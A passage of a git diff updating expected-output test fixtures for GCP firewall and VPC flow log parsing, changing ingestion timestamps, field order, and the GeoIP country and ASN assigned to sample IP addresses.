"{\"insertId\":\"5a27u1g22jks8t\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45062},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.85023465Z\"}", "kind": "event", "action": "firewall-rule", @@ -2182,7 +2206,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705628300Z", + "ingested": "2021-12-14T14:43:24.666232397Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.42.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", diff --git a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json index 852d0346b78..a9b1d9947c8 100644 --- a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json +++ b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json @@ -1,41 +1,6 @@ { "expected": [ { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 33478, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -46,6 +11,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -66,8 +34,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33478, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391119800Z", + "ingested": "2021-12-14T14:43:27.415168865Z", "original": "{\"insertId\":\"ut8lbrffooxyw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", @@ -75,6 +68,18 @@ "id": "ut8lbrffooxyw", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", + "bytes": 1776, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -89,11 +94,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -165,7 +175,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391145800Z", + "ingested": "2021-12-14T14:43:27.415171258Z", "original": "{\"insertId\":\"ut8lbrffooxzb\",\"jsonPayload\":{\"bytes_sent\":\"173663\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"68\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", @@ -181,11 +191,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33576, @@ -263,7 +278,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391169Z", + "ingested": "2021-12-14T14:43:27.415172027Z", "original": "{\"insertId\":\"ut8lbrffooxze\",\"jsonPayload\":{\"bytes_sent\":\"155707\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821143836Z\",\"packets_sent\":\"78\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", @@ -274,9 +289,36 @@ } }, { + "@timestamp": "2019-06-14T03:50:10.845Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "192.168.2.23" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { "continent_name": "Europe", @@ -299,6 +341,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415172500Z", + "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:45.860349247Z", + "end": "2019-06-14T03:40:46.031032701Z", + "id": "ut8lbrffooxyz", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -310,20 +362,28 @@ "iana_number": "6", "packets": 1, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "192.168.2.23" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { - "reporter": "SRC" + "reporter": "SRC", + "rtt": { + "ms": 36 + } }, "source": { "vpc": { @@ -338,21 +398,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391173100Z", - "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:45.860349247Z", - "end": "2019-06-14T03:40:46.031032701Z", - "id": "ut8lbrffooxyz", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", @@ -373,6 +418,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415173Z", + "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:36.895188084Z", + "end": "2019-06-14T03:40:37.048196137Z", + "id": "ut8lbrffooxz6", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -384,25 +439,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -413,23 +467,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391177600Z", - "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:36.895188084Z", - "end": "2019-06-14T03:40:37.048196137Z", - "id": "ut8lbrffooxz6", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -450,6 +495,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415173396Z", + "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:36.895188084Z", + "end": "2019-06-14T03:40:37.048196137Z", + "id": "ut8lbrffooxzf", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -461,46 +516,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:10.845Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.2.117", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391183100Z", - "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:36.895188084Z", - "end": "2019-06-14T03:40:37.048196137Z", - "id": "ut8lbrffooxzf", - "category": "network", - "type": "connection" } }, { @@ -515,11 +530,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -591,7 +611,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391187800Z", + "ingested": "2021-12-14T14:43:27.415173838Z", "original": "{\"insertId\":\"ut8lbrffooxz1\",\"jsonPayload\":{\"bytes_sent\":\"186151\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -607,11 +627,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -689,7 +714,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391191600Z", + "ingested": "2021-12-14T14:43:27.415174224Z", "original": "{\"insertId\":\"ut8lbrffooxyp\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"92\",\"reporter\":\"SRC\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", @@ -711,11 +736,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -787,7 +817,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391196Z", + "ingested": "2021-12-14T14:43:27.415174721Z", "original": "{\"insertId\":\"ut8lbrffooxzd\",\"jsonPayload\":{\"bytes_sent\":\"250864\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", @@ -809,11 +839,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -885,7 +920,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391200100Z", + "ingested": "2021-12-14T14:43:27.415175106Z", "original": 